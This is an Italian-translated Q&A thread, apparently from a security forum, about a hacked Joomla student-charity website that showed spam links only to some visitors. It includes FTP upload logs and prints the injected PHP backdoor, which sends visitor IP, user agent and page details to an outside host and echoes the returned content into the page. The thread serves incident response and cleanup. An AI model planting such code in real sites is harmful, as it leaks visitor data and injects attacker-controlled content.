Codice malware aggiunto quando il sito è stato visualizzato esternamente

Naviga le tue risposte
8

Vedi secondo followup in basso! (Ora con aggiunto vero codice dannoso! ... ish)

Promosso da questa domanda, I ' Ho notato che l'organizzazione di beneficenza studentesca della mia università ha un problema interessante sul loro sito web che finora non sono stato in grado di trovare la causa. (Mi scuso se questo sarebbe meglio su ServerFault, ma non sembra essere qualcosa di sbagliato con il server stesso, più di un problema di malware da qualche parte lungo la linea!)

Il loro sito web, link ha un intero carico di collegamenti porno / malware nella parte inferiore della pagina (sembra che questo a me), ma penso, solo quando lo visualizzi da una connessione a banda larga O2. Se lo visualizzi all'interno della rete dell'università o di un altro ISP, nulla viene visualizzato in fondo e, ovviamente, all'interno delle pagine di amministrazione del CMS, nulla viene visualizzato nel modello o nelle pagine.

Sono sicuro al 99% che il server non si trovi nella rete dell'università, osservando il suo IP (si pensi che sia ospitato da 'A Small Orange'). Non sono sicuramente l'unica persona ad aver visto questo problema, anche se non sono sicuro che sia specifico per un singolo ISP del Regno Unito, O2 Broadband (un amico su un ISP diverso, TalkTalk ha confermato di non vedere nulla). Non ho mai visto nulla di simile prima che non sia stato un semplice caso in cui il server è stato violato e il codice è stato inserito nella pagina.

Apprezzerei qualsiasi idea su percorsi da esaminare per risolvere questo, qualsiasi idea su cosa potrebbe causare questo e qualsiasi altro consiglio!

Grazie.

Bene, ora in followup al precedente (grazie a tutti per il vostro aiuto), ora sono riuscito a convincere la società di web hosting a darmi accesso SSH. Ho scoperto che il file .htaccess è stato modificato e il file .htaccess corrente è il seguente: link , che presumo sia almeno una parte del problema. Da un punto di vista della pulizia (in termini di avanzamento / recupero del sito di nuovo), so che dovrei cancellare l'intero server e ricominciare.

Tuttavia , è un server di hosting condiviso, quindi non posso cancellarlo perché non ho il controllo dell'intero server. Ho segnalato ai webhost che è stato violato e il loro consiglio era:

The account is a shared hosting account, but access is limited to just the account itself. No modifications can be made to the server itself from a user level compromise.

As nothing on the server has been compromised (only your account), the jailshell access provided will be sufficient for you to investigate and clean up this account.

È vero? Posso pulirlo correttamente? Immagino che se usassero una vulnerabilità nel software in esecuzione sul mio sito (cioè Joomla), allora sì, sarà solo la mia parte del server che è stata compromessa. Se tuttavia fosse presente una vulnerabilità nel sistema operativo che il server è in esecuzione, ovviamente l'intero lotto potrebbe essere compromesso: esiste un modo per capire quale potrebbe essere?

In prima dei link: ho visto & leggi tutto questo .

... e ora ho i registri che mostrano cosa hanno fatto: 

Thu Feb 02 14:35:46 2012 0 213.5.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:49 2012 0 213.5.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Thu Feb 02 14:35:53 2012 0 213.5.xxx.xxx 34957 /home/durhamdu/public_html/libraries/joomla/environment/url.php a _ i r durhamdu ftp 1 * c

Mon Apr 09 04:21:53 2012 0 128.127.xxx.xxx 45 /home/durhamdu/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:00 2012 0 128.127.xxx.xxx 45 /home/durhamdu/public_html/__check.html a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:06 2012 0 128.127.xxx.xxx 1457 /home/durhamdu/public_html/mooving/check.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:09 2012 0 128.127.xxx.xxx 17986 /home/durhamdu/public_html/mooving/laundro.php a _ i r durhamdu ftp 1 * c
Mon Apr 09 04:22:18 2012 0 128.127.xxx.xxx 52457 /home/durhamdu/public_html/.htaccess a _ i r durhamdu ftp

I file a cui ci si riferisce non sono più lì, ma i link continuano a essere visualizzati e anche se ho cambiato il nome file sospetto .htaccess . Hmm ...

Ok, quindi in secondo followup, ho trovato il codice dannoso, per la tua lettura collettiva: 

<?php   
// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $sReferer = '';
    if(isset($_SERVER['HTTP_REFERER']) === true)
    {
        $sReferer = strtolower($_SERVER['HTTP_REFERER']);
    }
    $stCurlHandle = NULL;
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics         
        $stCurlHandle = curl_init('http://webdefense1.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); 
    }
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle); 
    curl_close($stCurlHandle); 
    echo $sResult; // Statistic code end
?>

Ovviamente ora lo ho rimosso, e sto per aggiustare l'installazione di Joomla .. grazie per il tuo aiuto a tutti! : -)

    
posta Savara 08.05.2012 - 16:09
fonte

5 risposte

6

Credo che il server sia stato modificato in modo tale che serva solo la pagina con i link a determinate persone che accedono ad esso .

Questo è evidente quando si guarda la cache di Google per la pagina: link che mostra i link nella tua schermata.

Questa è una tattica comune usata in modo che per gli utenti del sito i collegamenti non compaiano ma per i motori di ricerca che fanno. Questo viene fatto perché questi link sono usati in attacchi SEO e il perpetratore si preoccupa solo che i motori di ricerca vedano i link.

Sembrerebbe che qualsiasi tecnica venga utilizzata identifica erroneamente gli utenti della banda larga O2 come un bot del motore di ricerca e viene quindi mostrato il link.

Un'altra possibilità è che la pagina abbia rimosso i collegamenti, ma O2 e Google stanno entrambi servendo una versione cache della pagina con i link ancora su .

    
risposta data 08.05.2012 - 19:37
fonte
2

Sembra che il server web sia stato compromesso

I cattivi hanno iniziato a diventare subdoli. Invece di inserire i link nella pagina in modo ingenuo, alcuni malintenzionati provvederanno affinché solo alcuni utenti vedano la versione modificata della pagina web. (Ho sicuramente visto questo filtraggio fatto usando l'intestazione Referer, ma ho sentito che viene fatto anche dall'indirizzo IP.)

Se il server è stato compromesso, cerca in questo sito come recuperare da un hack. Fondamentalmente, dovrai "nuke dall'orbita": cancella, riformatta, reinstalla da zero, aggiorna tutto il software, blocca il server, ripristina i dati da un vecchio backup conosciuto e solo dopo portalo torna in diretta su Internet pubblica.

    
risposta data 08.05.2012 - 20:51
fonte
1

Uno dei miei clienti ha lo stesso problema su un'installazione di Joomla. L'ho rintracciato nei seguenti file: 

../public_html/libraries/joomla/environment/url.php

e 

../public_html/templates/THEME_NAME/index.php

Il file url.php è un file fittizio, quindi cancella quello. Il file indice è un po 'disordinato. Quello che ho fatto è stato semplicemente cancellare quello nella cartella e poi caricarne uno nuovo da un'altra installazione dello stesso tema. Puoi scegliere gli hack riga per riga se lo desideri, ma se hai già utilizzato il tema altrove copia semplicemente la versione corretta nel sito compromesso.

Questo sembra essersi mantenuto, quindi credo che sia stato l'unico danno che ha fatto.

L'hack sembra essere finalizzato a inviare indirizzi IP e dettagli del computer a un indirizzo e-mail, presumibilmente in modo che possano quindi indirizzare efficacemente il tuo PC. Non inviare l'email!

    
risposta data 01.12.2012 - 02:37
fonte
0

forse il tuo ISP ha malware per il cambio DNS che indirizza gli utenti verso un altro sito web simile al server web dell'Università tenta di navigare sul sito web con l'indirizzo IP che è 184.173.73.180 per me, quale indirizzo IP ricevi quando esegui il ping Server Web ...?

    
risposta data 08.05.2012 - 17:08
fonte
0

Ho trovato quasi esattamente lo stesso problema con il sito web di proprietà di mia figlia.

È basato su Joomla. Nel PHP per le pagine ho trovato quasi esattamente lo stesso codice mostrato su questo blog. Ho temporaneamente rimosso questo codice e ora i collegamenti non vengono visualizzati.

L'hack è venuto alla luce quando un amico ha segnalato il link / i dannosi a mia figlia. stava usando O2 - ma non avevamo mai visto i collegamenti - usiamo Virgin Media e Sky.

Il sito Joomla è ospitato da Rochen che "fornisce" il Joomla. Pertanto, abbiamo solo il controllo del nostro sito, sviluppato da un consulente che non desidera più mantenere il sito.

Sono stato coinvolto perché ho più di 35 anni di esperienza nel campo dell'informatica - tra cui sito web, scrittura di generatore di progam, scrittura di compilatori, PHP ecc.

Anche l'altra mia figlia sta aiutando: 1 ° livello in informatica presso l'Università di Leeds.

Non abbiamo ancora individuato il codice dannoso sul sito in questione, qualsiasi commento o suggerimento sarebbe benvenuto.

    
risposta data 05.01.2013 - 12:49
fonte

Leggi altre domande sui tag

Best practice per l'integrazione di javascript esterni? Protezione CSRF necessaria per i clienti che non accettano i cookie?